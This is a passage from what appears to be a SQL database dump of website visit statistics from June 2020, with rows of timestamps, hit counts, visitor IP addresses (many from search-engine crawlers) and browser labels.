,8,8,0,0,'185.11.82.228','other'),(515336,1592596527,1,1,0,0,'66.249.70.72','chrome'),(515337,1592596551,8,8,0,0,'77.120.98.235','other'),(515338,1592596807,1,1,0,0,'157.55.39.193','other'),(515339,1592596999,1,1,0,0,'95.158.49.253','chrome'),(515340,1592597423,3,3,0,0,'66.249.70.70','chrome'),(515341,1592597649,1,1,0,0,'178.154.200.222','other'),(515342,1592597663,8,8,0,0,'185.11.82.228','other'),(515343,1592597798,1,1,0,0,'66.249.64.38','chrome'),(515344,1592597964,4,4,0,0,'66.249.70.69','chrome'),(515345,1592598043,1,1,0,0,'66.249.70.72','chrome'),(515346,1592598093,8,8,0,0,'77.120.98.235','other'),(515347,1592598215,1,1,0,0,'157.55.39.52','other'),(515348,1592598762,1,1,0,0,'51.77.125.148','chrome'),(515349,1592598775,5,5,0,0,'66.249.70.70','chrome'),(515350,1592598871,2,2,0,0,'66.249.64.33','chrome'),(515351,1592599077,8,8,0,0,'185.11.82.228','other'),(515352,1592599156,10,9,1,0,'66.249.70.69',''),(515353,1592599250,1,1,0,0,'178.154.200.216','other'),(515354,1592599252,1,1,0,0,'66.249.64.36','chrome'),(515355,1592599347,1,1,0,0,'66.249.70.72','chrome'),(515356,1592599775,1,1,0,0,'66.249.70.70','chrome'),(515357,1592600123,8,8,0,0,'77.120.98.235','other'),(515358,1592600388,1,1,0,0,'192.157.230.165','chrome'),(515359,1592600423,1,1,0,0,'66.249.64.36','chrome'),(515360,1592600433,1,1,0,0,'185.67.1.241','chrome'),(515361,1592600457,8,8,0,0,'185.11.82.228','other'),(515362,1592600813,1,1,0,0,'213.180.203.16','other'),(515363,1592601314,1,1,0,0,'157.55.39.137','other'),(515364,1592601434,1,1,0,0,'66.249.70.72','chrome'),(515365,1592601643,1,1,0,0,'157.55.39.52','other'),(515366,1592601817,8,8,0,0,'185.11.82.228','other'),(515367,1592602049,2,2,0,0,'51.68.11.215','chrome'),(515368,1592602220,1,1,0,0,'66.249.70.69','chrome'),(515369,1592602233,8,8,0,0,'77.120.98.235','other'),(515370,1592602423,1,1,0,0,'66.249.70.72','chrome'),(515371,1592603216,8,8,0,0,'185.11.82.228','other'),(515372,1592603843,1,1,0,0,'66.249.64.38','chrome'),(515373,1592603876,3,3,0,0,'66.249.70.69','chrome'),(515374,1592603885,44,44,0,0,'62.210.78.76','other'),(515375,1592604020,1,1,0,0,'66.249.64.36','chrome'),(515376,1592604291,1,1,0,0,'178.154.200.222','other'),(515377,1592604412,8,8,0,0,'77.120.98.235','other'),(515378,1592604415,1,1,0,0,'66.249.70.70','chrome'),(515379,1592604437,2,2,0,0,'66.249.70.72','chrome'),(515380,1592604583,8,8,0,0,'185.11.82.228','other'),(515381,1592604939,1,1,0,0,'66.249.64.36','chrome'),(515382,1592605721,1,1,0,0,'157.55.39.52','other'),(515383,1592605747,1,1,0,0,'178.154.200.222','other'),(515384,1592605773,2,2,0,0,'66.249.70.69','chrome'),(515385,1592605961,3,3,0,0,'66.249.64.33','chrome'),(515386,1592606027,8,8,0,0,'185.11.82.228','other'),(515387,1592606242,1,1,0,0,'157.55.39.137','other'),(515388,1592606505,8,8,0,0,'77.120.98.235','other'),(515389,1592606547,1,1,0,0,'8.29.198.26','other'),(515390,1592606558,1,1,0,0,'8.29.198.25','other'),(515391,1592606704,1,1,0,0,'54.36.149.66','other'),(515392,1592606888,1,0,1,0,'66.249.70.72',''),(515393,1592607277,2,2,0,0,'66.249.70.70','chrome'),(515394,1592607335,8,8,0,0,'185.11.82.228','other'),(515395,1592607438,1,1,0,0,'66.249.70.69','chrome'),(515396,1592607779,2,2,0,0,'66.249.70.72','chrome'),(515397,1592608213,1,1,0,0,'66.249.64.38','chrome'),(515398,1592608596,4,3,1,0,'66.249.70.70',''),(515399,1592608669,5,5,0,0,'66.249.70.69','chrome'),(515400,1592608677,8,8,0,0,'185.11.82.228','other'),(515401,1592608700,8,8,0,0,'77.120.98.235','other'),(515402,1592608906,1,0,1,0,'66.249.70.72',''),(515403,1592608917,1,1,0,0,'66.249.64.36','chrome'),(515404,1592608970,1,1,0,0,'66.249.64.33','chrome'),(515405,1592609062,4,4,0,0,'66.249.70.70','chrome'),(515406,1592609080,1,1,0,0,'157.55.39.193','other'),(515407,1592609485,1,1,0,0,'17.58.99.7','other'),(515408,1592609573,2,2,0,0,'66.249.64.38','chrome'),(515409,1592609612,13,13,0,0,'66.249.70.69','chrome'),(515410,1592610044,8,8,0,0,'185.11.82.228','other'),(515411,1592610047,2,2,0,0,'66.249.70.72','chrome'),(515412,1592610148,1,1,0,0,'66.249.64.33','chrome'),(515413,1592610164,1,1,0,0,'178.154.200.159','other'),(515414,1592610182,1,1,0,0,'66.249.70.70','chrome'),(515415,1592610320,1,1,0,0,'66.249.64.36','chrome'),(515416,1592610326,2,2,0,0,'157.55.39.137','other'),(515417,1592610827,8,8,0,0,'77.120.98.235','other'),(515418,1592610906,1,1,0,0,'62.205.134.182','other'),(515419,1592611358,8,8,0,0,'185.11.82.228','other'),(515420,1592611875,1,1,0,0,'213.180.203.16','other'),(515421,1592612219,15,15,0,0,'103.224.80.3','chrome'),(515422,1592612401,2,2,0,0,'199.116.78.83','chrome'),(515423,1592612733,8,8,0,0,'185.11.82.228','other'),(515424,1592612929,8,8,0,0,'77.120.98.235','other'),(515425,1592613219,1,1,0,0,'66.249.64.33','chrome'),(515426,1592613325,1,1,0,0,'157.55.39.137','other'),(515427,1592614092,8,8,0,0,'185.11.82.228','other'),(515428,1592614854,1,1,0,0,'178.154.200.222','other'),(515429,1592614955,8,8,0,0,'77.120.98.235','other'),(515430,1592615009,1,1,0,0,'2.47.39.220','other'),(515431,1592615185,2,2,0,0,'51.68.11.211','chrome'),(515432,1592615343,1,1,0,0,'66.249.64.33','chrome'),(515433,1592615355,2,2,0,0,'222.122.60.18','chrome'),(515434,1592615427,8,8,0,0,'185.11.82.228','other'),(515435,1592616210,1,1,0,0,'213.180.203.109','other'),(515436,1592616506,2,2,0,0,'157.55.39.137','other'),(515437,1592616798,8,8,0,0,'185.11.82.228','other'),(515438,1592616979,1,1,0,0,'178.154.200.97','other'),(515439,1592617019,8,8,0,0,'77.120.98.235','other'),(515440,1592617067,2,2,0,0,'66.249.70.72','chrome'),(515441,1592617379,1,1,0,0,'8.29.198.27','other'),(515442,1592617380,1,1,0,0,'8.29.198.25','other'),(515443,1592617544,1,1,0,0,'66.249.70.69','chrome'),(515444,1592618279,8,8,0,0,'185.11.82.228','other'),(515445,1592618498,1,1,0,0,'40.77.202.158','other'),(515446,1592619125,8,8,0,0,'77.120.98.235','other'),(515447,1592619623,8,8,0,0,'185.11.82.228','other'),(515448,1592619768,1,1,0,0,'91.209.11.236','other'),(515449,1592620976,8,8,0,0,'185.11.82.228','other'),(515450,1592621163,8,8,0,0,'77.120.98.235','other'),(515451,1592622122,1,1,0,0,'17.58.99.7','other'),(515452,1592622204,2,2,0,0,'66.249.70.69','chrome'),(515453,1592622328,8,8,0,0,'185.11.82.228','other'),(515454,1592622389,1,1,0,0,'66.249.70.70','chrome'),(515455,1592622557,1,1,0,0,'178.154.200.196','other'),(515456,1592622793,1,1,0,0,'157.55.39.52','other'),(515457,1592622857,1,1,0,0,'213.180.203.16','other'),(515458,1592623260,8,8,0,0,'77.120.98.235','other'),(515459,1592623560,1,1,0,0,'91.227.16.127','chrome'),(515460,1592623668,8,8,0,0,'185.11.82.228','other'),(515461,1592623968,1,1,0,0,'66.249.64.38','chrome'),(515462,1592625010,8,8,0,0,'185.11.82.228','other'),(515463,1592625362,8,8,0,0,'77.120.98.235','other'),(515464,1592625559,2,2,0,0,'66.249.70.69','chrome'),(515465,1592625741,1,1,0,0,'17.58.99.7','other'),(515466,1592626181,3,3,0,0,'66.249.70.70','chrome'),(515467,1592626188,1,1,0,0,'157.55.39.137','other'),(515468,1592626366,8,8,0,0,'185.11.82.228','other'),(515469,1592627459,1,1,0,0,'66.249.70.69','chrome'),(515470,1592627478,8,8,0,0,'77.120.98.235','other'),(515471,1592627501,2,2,0,0,'157.55.39.137','other'),(515472,1592627713,8,8,0,0,'185.11.82.228','other'),(515473,1592627946,2,2,0,0,'193.106.248.114','chrome'),(515474,1592628199,2,2,0,0,'8.29.198.26','other'),(515475,1592628203,2,2,0,0,'35.208.193.163','chrome'),(515476,1592628246,1,1,0,0,'66.249.70.70','chrome'),(515477,1592628651,1,1,0,0,'62.205.134.182','other'),(515478,1592629093,1,1,0,0,'157.55.39.193','other'),(515479,1592629215,8,8,0,0,'185.11.82.228','other'),(515480,1592629222,1,1,0,0,'66.249.70.70','chrome'),(515481,1592629365,1,1,0,0,'66.249.70.69','chrome'),(515482,1592629553,8,8,0,0,'77.120.98.235','other'),(515483,1592630006,1,1,0,0,'157.55.39.52','other'),(515484,1592630630,8,8,0,0,'185.11.82.228','other'),(515485,1592631016,1,1,0,0,'157.55.39.193','other'),(515486,1592631315,1,1,0,0,'157.55.39.137','other'),(515487,1592631417,1,1,0,0,'31.177.95.231','chrome'),(515488,1592631629,2,2,0,0,'51.68.11.211','chrome'),(515489,1592631666,8,8,0,0,'77.120.98.235','other'),(515490,1592631901,1,1,0,0,'91.196.178.86','chrome'),(515491,1592632049,8,8,0,0,'185.11.82.228','other'),(515492,1592632890,1,1,0,0,'157.55.39.193','other'),(515493,1592633173,1,1,0,0,'109.86.69.227','firefox'),(515494,1592633389,2,2,0,0,'66.249.70.69','chrome'),(515495,1592633556,8,8,0,0,'185.11.82.228','other'),(515496,1592633787,1,1,0,0,'35.213.146.206','chrome'),(515497,1592633798,8,8,0,0,'77.120.98.235','other'),(515498,1592634287,1,1,0,0,'66.249.70.70','chrome'),(515499,1592634450,1,1,0,0,'66.249.70.72','chrome'),(515500,1592635065,8,8,0,0,'185.11.82.228','other'),(515501,1592635950,8,8,0,0,'77.120.98.235','other'),(515502,1592636517,8,8,0,0,'185.11.82.228','other'),(515503,1592636522,2,2,0,0,'217.29.63.235','chrome'),(515504,1592636853,1,1,0,0,'157.55.39.52','other'),(515505,1592637931,1,1,0,0,'66.249.70.70','chrome'),(515506,1592638180,8,8,0,0,'77.120.98.235','other'),(515507,1592638216,8,8,0,0,'185.11.82.228','other'),(515508,1592638305,1,1,0,0,'51.68.11.215','chrome'),(515509,1592638571,1,1,0,0,'131.220.6.152','chrome'),(515510,1592638998,1,1,0,0,'157.55.39.193','other'),(515511,1592639023,2,2,0,0,'8.29.198.26','other'),(515512,1592639160,1,1,0,0,'198.16.66.140','chrome'),(515513,1592639563,3,3,0,0,'157.55.39.137','other'),(515514,1592639567,4,4,0,0,'157.55.39.52','other'),(515515,1592640320,1,1,0,0,'68.183.33.11','chrome'),(515516,1592640380,1,1,0,0,'66.249.70.72','chrome'),(515517,1592640382,8,8,0,0,'185.11.82.228','other'),(515518,1592640452,8,8,0,0,'77.120.98.235','other'),(515519,1592640775,1,1,0,0,'157.55.39.137','other'),(515520,1592640905,1,1,0,0,'194.61.24.94','other'),(515521,1592641529,1,1,0,0,'89.46.104.160','chrome'),(515522,1592641919,1,1,0,0,'66.249.70.70','chrome'),(515523,1592642113,1,1,0,0,'66.249.64.33','chrome'),(515524,1592642433,8,8,0,0,'185.11.82.228','other'),(515525,1592642614,8,8,0,0,'77.120.98.235','other'),(515526,1592643719,1,1,0,0,'185.5.236.191','chrome'),(515527,1592644027,1,1,0,0,'109.86.69.227','firefox'),(515528,1592644576,8,8,0,0,'185.11.82.228','other'),(515529,1592644799,2,2,0,0,'62.210.185.4','chrome'),(515530,1592644831,8,8,0,0,'77.120.98.235','other'),(515531,1592645079,1,1,0,0,'51.77.125.148','chrome'),(515532,1592645085,1,1,0,0,'46.21.198.188','chrome'),(515533,1592645171,1,1,0,0,'17.58.99.7','other'),(515534,1592645640,1,1,0,0,'66.249.70.69','chrome'),(515535,1592645865,1,1,0,0,'213.180.203.16','other'),(515536,1592646292,1,1,0,0,'157.55.39.137','other'),(515537,1592646718,8,8,0,0,'185.11.82.228','other'),(515538,1592646857,1,1,0,0,'5.188.62.25','chrome'),(515539,1592647008,8,8,0,0,'77.120.98.235','other'),(515540,1592648345,3,2,1,0,'66.249.70.70',''),(515541,1592648352,9,9,0,0,'66.249.70.69','chrome'),(515542,1592648830,8,8,0,0,'185.11.82.228','other'),(515543,1592648897,2,1,1,0,'66.249.70.70',''),(515544,1592648915,3,3,0,0,'66.249.64.33','chrome'),(515545,1592649240,7,7,0,0,'66.249.70.70','chrome'),(515546,1592649244,4,4,0,0,'66.249.70.72','chrome'),(515547,1592649254,9,8,1,0,'66.249.70.69',''),(515548,1592649263,8,8,0,0,'77.120.98.235','other'),(515549,1592649608,4,4,0,0,'66.249.64.38','chrome'),(515550,1592649725,18,18,0,0,'66.249.70.69','chrome'),(515551,1592649765,1,1,0,0,'66.249.64.36','chrome'),(515552,1592649844,2,2,0,0,'8.29.198.26','other'),(515553,1592650070,1,1,0,0,'109.74.154.72','chrome'),(515554,1592650151,2,2,0,0,'66.249.70.70','chrome'),(515555,1592650323,1,1,0,0,'213.180.203.16','other'),(515556,1592650463,1,1,0,0,'157.55.39.52','other'),(515557,1592650591,1,1,0,0,'66.249.64.38','chrome'),(515558,1592650790,1,1,0,0,'185.234.218.239','firefox'),(515559,1592650899,3,3,0,0,'66.249.64.48','chrome'),(515560,1592650946,8,8,0,0,'185.11.82.228','other'),(515561,1592651505,2,2,0,0,'66.249.64.36','chrome'),(515562,1592651527,8,8,0,0,'77.120.98.235','other'),(515563,1592651692,2,2,0,0,'66.249.70.72','chrome'),(515564,1592651756,1,1,0,0,'157.55.39.193','other'),(515565,1592651890,1,1,0,0,'66.249.70.69','chrome'),(515566,1592652316,1,1,0,0,'157.55.39.52','other'),(515567,1592652352,1,1,0,0,'37.53.123.168','chrome'),(515568,1592652651,1,1,0,0,'54.36.149.32','other'),(515569,1592652664,1,1,0,0,'66.249.64.36','chrome'),(515570,1592652825,2,2,0,0,'66.249.70.69','chrome'),(515571,1592652870,1,1,0,0,'66.249.70.70','chrome'),(515572,1592653118,3,3,0,0,'66.249.70.72','chrome'),(515573,1592653190,8,8,0,0,'185.11.82.228','other'),(515574,1592653564,1,1,0,0,'54.36.149.75','other'),(515575,1592653840,8,8,0,0,'77.120.98.235','other'),(515576,1592654154,1,1,0,0,'157.55.39.193','other'),(515577,1592654403,1,1,0,0,'213.180.203.16','other'),(515578,1592655624,8,8,0,0,'185.11.82.228','other'),(515579,1592655868,2,2,0,0,'157.55.39.52','other'),(515580,1592655928,1,1,0,0,'213.180.203.105','other'),(515581,1592655951,1,1,0,0,'157.55.39.137','other'),(515582,1592656200,1,1,0,0,'66.249.70.70','chrome'),(515583,1592656203,1,1,0,0,'66.249.70.69','chrome'),(515584,1592656210,8,8,0,0,'77.120.98.235','other'),(515585,1592656521,1,1,0,0,'66.249.64.38','chrome'),(515586,1592656549,1,1,0,0,'66.249.64.33','chrome'),(515587,1592657281,3,3,0,0,'157.55.39.52','other'),(515588,1592657404,1,1,0,0,'157.55.39.193','other'),(515589,1592657835,1,1,0,0,'91.196.178.21','chrome'),(515590,1592658404,2,2,0,0,'66.249.70.72','chrome'),(515591,1592658706,8,8,0,0,'77.120.98.235','other'),(515592,1592658824,1,1,0,0,'66.249.70.70','chrome'),(515593,1592659074,8,8,0,0,'185.11.82.228','other'),(515594,1592659170,1,1,0,0,'157.55.39.137','other'),(515595,1592659751,1,1,0,0,'66.249.64.38','chrome'),(515596,1592660548,1,1,0,0,'66.249.70.70','chrome'),(515597,1592660670,2,2,0,0,'8.29.198.27','other'),(515598,1592660995,1,1,0,0,'185.117.119.84','chrome'),(515599,1592661095,8,8,0,0,'77.120.98.235','other'),(515600,1592661441,1,1,0,0,'66.249.70.72','chrome'),(515601,1592661917,1,1,0,0,'66.249.70.69','chrome'),(515602,1592662248,1,1,0,0,'66.249.70.70','chrome'),(515603,1592662391,1,1,0,0,'178.154.200.222','other'),(515604,1592662488,8,8,0,0,'185.11.82.228','other'),(515605,1592663524,8,8,0,0,'77.120.98.235','other'),(515606,1592663538,1,1,0,0,'40.114.64.162','chrome'),(515607,1592663629,1,1,0,0,'66.249.64.36','chrome'),(515608,1592663727,2,2,0,0,'157.55.39.137','other'),(515609,1592663832,1,1,0,0,'46.211.24.118','chrome'),(515610,1592664140,1,1,0,0,'192.36.52.37','other'),(515611,1592664476,2,2,0,0,'66.249.70.70','chrome'),(515612,1592665065,1,1,0,0,'157.55.39.137','other'),(515613,1592665312,3,3,0,0,'66.249.70.69','chrome'),(515614,1592665926,1,1,0,0,'66.249.64.38','chrome'),(515615,1592665936,8,8,0,0,'77.120.98.235','other'),(515616,1592666051,8,8,0,0,'185.11.82.228','other'),(515617,1592666149,1,1,0,0,'66.249.64.33','chrome'),(515618,1592666708,1,1,0,0,'157.55.39.137','other'),(515619,1592666893,1,1,0,0,'209.17.96.82','other'),(515620,1592667343,1,1,0,0,'66.249.70.72','chrome'),(515621,1592668427,8,8,0,0,'77.120.98.235','other'),(515622,1592669275,1,1,0,0,'157.55.39.193','other'),(515623,1592669368,1,1,0,0,'66.249.70.70','chrome'),(515624,1592669441,1,1,0,0,'66.249.70.72','chrome'),(515625,1592669872,1,1,0,0,'66.249.64.36','chrome'),(515626,1592669895,8,8,0,0,'185.11.82.228','other'),(515627,1592671050,8,8,0,0,'77.120.98.235','other'),(515628,1592671241,1,1,0,0,'66.249.70.72','chrome'),(515629,1592671389,1,1,0,0,'157.55.39.193','other'),(515630,1592671492,1,1,0,0,'8.29.198.27','other'),(515631,1592671522,1,1,0,0,'8.29.198.26','other'),(515632,1592671531,1,1,0,0,'17.58.99.7','other'),(515633,1592672541,1,1,0,0,'66.249.70.69','chrome'),(515634,1592673463,1,1,0,0,'94.153.68.71','chrome'),(515635,1592673465,1,1,0,0,'157.55.39.52','other'),(515636,1592673589,8,8,0,0,'77.120.98.235','other'),(515637,1592673908,1,1,0,0,'157.55.39.137','other'),(515638,1592674098,8,8,0,0,'185.11.82.228','other'),(515639,1592674603,1,1,0,0,'66.249.70.69','chrome'),(515640,1592674812,1,1,0,0,'157.55.39.137','other'),(515641,1592675085,1,1,0,0,'66.249.64.33','chrome'),(515642,1592676419,8,8,0,0,'77.120.98.235','other'),(515643,1592676529,3,3,0,0,'157.55.39.193','other'),(515644,1592676724,1,1,0,0,'66.249.64.38','chrome'),(515645,1592677691,1,1,0,0,'46.211.80.151','chrome'),(515646,1592678160,1,1,0,0,'157.55.39.193','other'),(515647,1592678317,1,1,0,0,'157.55.39.52','other'),(515648,1592678336,1,1,0,0,'66.249.64.33','chrome'),(515649,1592678621,8,8,0,0,'185.11.82.228','other'),(515650,1592679077,8,8,0,0,'77.120.98.235','other'),(515651,1592679107,1,1,0,0,'5.44.173.43','chrome'),(515652,1592679234,2,2,0,0,'178.154.200.222','other'),(515653,1592679321,1,1,0,0,'46.211.80.151','chrome'),(515654,1592679380,1,1,0,0,'157.55.39.52','other'),(515655,1592679951,1,1,0,0,'157.55.39.193','other'),(515656,1592680108,1,1,0,0,'66.249.70.72','chrome'),(515657,1592680714,1,1,0,0,'157.55.39.52','other'),(515658,1592680780,3,3,0,0,'66.249.70.70','chrome'),(515659,1592681156,3,3,0,0,'66.249.70.72','chrome'),(515660,1592681257,7,7,0,0,'66.249.70.69','chrome'),(515661,1592681516,2,2,0,0,'157.55.39.193','other'),(515662,1592681623,1,1,0,0,'157.55.39.137','other'),(515663,1592681855,8,8,0,0,'77.120.98.235','other'),(515664,1592681900,1,1,0,0,'66.249.64.36','chrome'),(515665,1592682325,1,1,0,0,'8.29.198.25','other'),(515666,1592682343,1,1,0,0,'8.29.198.27','other'),(515667,1592682635,1,1,0,0,'157.55.39.193','other'),(515668,1592683081,8,8,0,0,'185.11.82.228','other'),(515669,1592683137,1,1,0,0,'157.55.39.137','other'),(515670,1592683243,2,2,0,0,'66.249.70.69','chrome'),(515671,1592683326,1,1,0,0,'178.154.200.222','other'),(515672,1592683456,1,1,0,0,'157.55.39.52','other'),(515673,1592683700,1,1,0,0,'66.249.70.72','chrome'),(515674,1592684578,8,8,0,0,'77.120.98.235','other'),(515675,1592684657,8,8,0,0,'185.11.82.228','other'),(515676,1592685097,1,1,0,0,'66.249.70.70','chrome'),(515677,1592685200,1,1,0,0,'66.249.70.69','chrome'),(515678,1592685537,1,1,0,0,'66.249.64.36','chrome'),(515679,1592685880,1,1,0,0,'66.249.64.38','chrome'),(515680,1592686208,8,8,0,0,'185.11.82.228','other'),(515681,1592686334,2,2,0,0,'66.249.70.72','chrome'),(515682,1592686821,2,2,0,0,'66.249.70.70','chrome'),(515683,1592687144,1,1,0,0,'17.58.99.7','other'),(515684,1592687172,1,1,0,0,'109.200.248.137','firefox'),(515685,1592687195,8,8,0,0,'77.120.98.235','other'),(515686,1592687331,1,1,0,0,'66.249.70.69','chrome'),(515687,1592687360,1,1,0,0,'66.249.70.72','chrome'),(515688,1592687411,1,1,0,0,'167.99.97.137','chrome'),(515689,1592687621,8,8,0,0,'185.11.82.228','other'),(515690,1592687745,1,1,0,0,'157.55.39.52','other'),(515691,1592687861,2,2,0,0,'66.249.64.36','chrome'),(515692,1592688818,1,1,0,0,'178.154.200.222','other'),(515693,1592688939,1,1,0,0,'213.180.203.122','other'),(515694,1592689004,1,1,0,0,'66.249.64.36','chrome'),(515695,1592689016,8,8,0,0,'185.11.82.228','other'),(515696,1592689420,1,1,0,0,'157.55.39.52','other'),(515697,1592689759,1,1,0,0,'178.154.200.222','other'),(515698,1592689795,8,8,0,0,'77.120.98.235','other'),(515699,1592690523,1,1,0,0,'66.249.70.72','chrome'),(515700,1592690580,8,8,0,0,'185.11.82.228','other'),(515701,1592690895,1,1,0,0,'178.154.200.97','other'),(515702,1592690980,1,1,0,0,'66.249.70.69','chrome'),(515703,1592691017,1,1,0,0,'213.180.203.16','other'),(515704,1592691797,2,2,0,0,'66.249.70.70','chrome'),(515705,1592692155,8,8,0,0,'185.11.82.228','other'),(515706,1592692314,8,8,0,0,'77.120.98.235','other'),(515707,1592692692,1,1,0,0,'66.249.70.69','chrome'),(515708,1592692788,1,1,0,0,'66.249.70.70','chrome'),(515709,1592693073,1,1,0,0,'66.249.64.38','chrome'),(515710,1592693149,1,1,0,0,'8.29.198.26','other'),(515711,1592693173,1,1,0,0,'8.29.198.27','other'),(515712,1592693284,1,1,0,0,'66.249.64.33','chrome'),(515713,1592693683,1,1,0,0,'157.55.39.193','other'),(515714,1592693742,8,8,0,0,'185.11.82.228','other'),(515715,1592693758,1,1,0,0,'66.249.64.36','chrome'),(515716,1592693968,1,1,0,0,'66.249.70.69','chrome'),(515717,1592694541,2,2,0,0,'157.55.39.52','other'),(515718,1592694745,1,1,0,0,'157.55.39.193','other'),(515719,1592694847,8,8,0,0,'77.120.98.235','other'),(515720,1592695105,8,8,0,0,'185.11.82.228','other'),(515721,1592695499,1,1,0,0,'91.209.11.236','other'),(515722,1592696170,1,1,0,0,'157.55.39.52','other'),(515723,1592696429,1,1,0,0,'213.180.203.16','other'),(515724,1592696545,8,8,0,0,'185.11.82.228','other'),(515725,1592697044,1,1,0,0,'18.217.50.82','chrome'),(515726,1592697077,1,1,0,0,'17.58.99.7','other'),(515727,1592697267,1,1,0,0,'157.55.39.193','other'),(515728,1592697305,1,1,0,0,'62.205.134.182','other'),(515729,1592697629,1,1,0,0,'66.249.64.33','chrome'),(515730,1592697722,8,8,0,0,'77.120.98.235','other'),(515731,1592697908,8,8,0,0,'185.11.82.228','other'),(515732,1592698108,1,1,0,0,'157.55.39.52','other'),(515733,1592698333,2,2,0,0,'91.209.11.236','other'),(515734,1592698632,2,2,0,0,'66.249.70.72','chrome'),(515735,1592698848,1,1,0,0,'66.249.70.69','chrome'),(515736,1592699065,1,1,0,0,'178.154.200.119','other'),(515737,1592699323,8,8,0,0,'185.11.82.228','other'),(515738,1592699762,1,1,0,0,'157.55.39.52','other'),(515739,1592700110,2,2,0,0,'207.46.13.26','other'),(515740,1592700524,2,2,0,0,'66.249.70.72','chrome'),(515741,1592700545,8,8,0,0,'77.120.98.235','other'),(515742,1592700633,8,8,0,0,'185.11.82.228','other'),(515743,1592700657,1,0,1,0,'66.249.70.69',''),(515744,1592701506,2,2,0,0,'66.249.64.36','chrome'),(515745,1592701944,8,8,0,0,'185.11.82.228','other'),(515746,1592702513,1,1,0,0,'207.46.13.26','other'),(515747,1592703164,8,8,0,0,'77.120.98.235','other'),(515748,1592703228,8,8,0,0,'185.11.82.228','other'),(515749,1592703251,1,1,0,0,'17.58.99.7','other'),(515750,1592703586,1,1,0,0,'213.180.203.17','other'),(515751,1592703762,1,1,0,0,'91.209.11.236','other'),(515752,1592703970,2,2,0,0,'8.29.198.26','other'),(515753,1592704518,8,8,0,0,'185.11.82.228','other'),(515754,1592704897,1,1,0,0,'178.154.200.112','other'),(515755,1592705676,8,8,0,0,'77.120.98.235','other'),(515756,1592705789,8,8,0,0,'185.11.82.228','other'),(515757,1592705849,1,1,0,0,'66.249.70.72','chrome'),(515758,1592705863,2,2,0,0,'157.55.39.52','other'),(515759,1592705880,1,1,0,0,'66.249.70.69','chrome'),(515760,1592705990,2,2,0,0,'66.249.70.70','chrome'),(515761,1592706009,1,1,0,0,'157.55.39.137','other'),(515762,1592706775,1,1,0,0,'178.154.200.222','other'),(515763,1592706779,1,1,0,0,'178.154.200.220','other'),(515764,1592707087,8,8,0,0,'185.11.82.228','other'),(515765,1592707126,1,1,0,0,'213.180.203.95','other'),(515766,1592707242,1,1,0,0,'207.46.13.26','other'),(515767,1592708282,1,1,0,0,'13.66.139.0','other'),(515768,1592708317,1,1,0,0,'66.249.70.72','chrome'),(515769,1592708322,8,8,0,0,'77.120.98.235','other'),(515770,1592708339,8,8,0,0,'185.11.82.228','other'),(515771,1592708719,1,1,0,0,'207.46.13.26','other'),(515772,1592709580,1,1,0,0,'207.46.13.185','other'),(515773,1592709601,8,8,0,0,'185.11.82.228','other'),(515774,1592710102,1,1,0,0,'213.180.203.16','other'),(515775,1592710733,1,1,0,0,'91.209.11.236','other'),(515776,1592710840,8,8,0,0,'185.11.82.228','other'),(515777,1592710873,2,2,0,0,'66.249.70.70','chrome'),(515778,1592710921,8,8,0,0,'77.120.98.235','other'),(515779,1592711736,1,1,0,0,'17.58.99.7','other'),(515780,1592711943,1,1,0,0,'157.55.39.193','other'),(515781,1592712039,3,3,0,0,'35.238.116.151','chrome'),(515782,1592712057,3,3,0,0,'35.238.41.138','chrome'),(515783,1592712179,8,8,0,0,'185.11.82.228','other'),(515784,1592712360,1,1,0,0,'66.249.64.38','chrome'),(515785,1592713423,8,8,0,0,'185.11.82.228','other'),(515786,1592713429,1,1,0,0,'66.249.70.72','chrome'),(515787,1592713503,8,8,0,0,'77.120.98.235','other'),(515788,1592714207,1,1,0,0,'51.68.11.215','chrome'),(515789,1592714763,8,8,0,0,'185.11.82.228','other'),(515790,1592714797,1,1,0,0,'8.29.198.25','other'),(515791,1592714827,1,1,0,0,'8.29.198.26','other'),(515792,1592715237,1,1,0,0,'157.55.39.193','other'),(515793,1592715268,1,1,0,0,'62.205.134.182','other'),(515794,1592715299,1,1,0,0,'66.249.70.72','chrome'),(515795,1592716117,8,8,0,0,'185.11.82.228','other'),(515796,1592716249,8,8,0,0,'77.120.98.235','other'),(515797,1592717509,8,8,0,0,'185.11.82.228','other'),(515798,1592717888,1,1,0,0,'157.55.39.193','other'),(515799,1592718351,1,1,0,0,'207.46.13.185','other'),(515800,1592718838,8,8,0,0,'77.120.98.235','other'),(515801,1592718844,8,8,0,0,'185.11.82.228','other'),(515802,1592719126,1,1,0,0,'88.198.146.180','chrome'),(515803,1592719304,1,1,0,0,'81.88.49.52','chrome'),(515804,1592719311,1,1,0,0,'81.88.49.29','chrome'),(515805,1592719315,1,1,0,0,'178.154.200.222','other'),(515806,1592719335,1,1,0,0,'81.88.49.6','chrome'),(515807,1592719340,1,1,0,0,'81.88.49.57','chrome'),(515808,1592720218,1,1,0,0,'51.83.200.173','firefox'),(515809,1592720230,8,8,0,0,'185.11.82.228','other'),(515810,1592720645,1,1,0,0,'81.2.195.186','chrome'),(515811,1592720707,1,1,0,0,'194.61.24.94','other'),(515812,1592720713,2,2,0,0,'109.70.3.170','chrome'),(515813,1592720858,2,2,0,0,'31.13.127.21','other'),(515814,1592721483,8,8,0,0,'77.120.98.235','other'),(515815,1592721586,8,8,0,0,'185.11.82.228','other'),(515816,1592722065,1,1,0,0,'178.154.200.196','other'),(515817,1592722180,1,1,0,0,'95.134.168.94','chrome'),(515818,1592722708,1,1,0,0,'5.9.97.200','other'),(515819,1592723026,8,8,0,0,'185.11.82.228','other'),(515820,1592724200,8,8,0,0,'77.120.98.235','other'),(515821,1592724432,8,8,0,0,'185.11.82.228','other'),(515822,1592724958,1,1,0,0,'131.220.6.152','chrome'),(515823,1592725060,1,1,0,0,'178.154.200.79','other'),(515824,1592725063,1,1,0,0,'178.154.200.222','other'),(515825,1592725626,1,1,0,0,'8.29.198.27','other'),(515826,1592725656,1,1,0,0,'8.29.198.25','other'),(515827,1592725855,8,8,0,0,'185.11.82.228','other'),(515828,1592725936,4,4,0,0,'157.55.39.52','other'),(515829,1592726673,1,1,0,0,'207.46.13.26','other'),(515830,1592726682,2,2,0,0,'207.46.13.185','other'),(515831,1592727010,8,8,0,0,'77.120.98.235','other'),(515832,1592727295,8,8,0,0,'185.11.82.228','other'),(515833,1592728302,1,1,0,0,'213.180.203.17','other'),(515834,1592728471,1,1,0,0,'130.0.55.152','chrome'),(515835,1592728552,1,1,0,0,'35.208.193.163','chrome'),(515836,1592728574,1,1,0,0,'66.249.70.70','chrome'),(515837,1592728817,8,8,0,0,'185.11.82.228','other'),(515838,1592729489,1,1,0,0,'213.180.203.16','other'),(515839,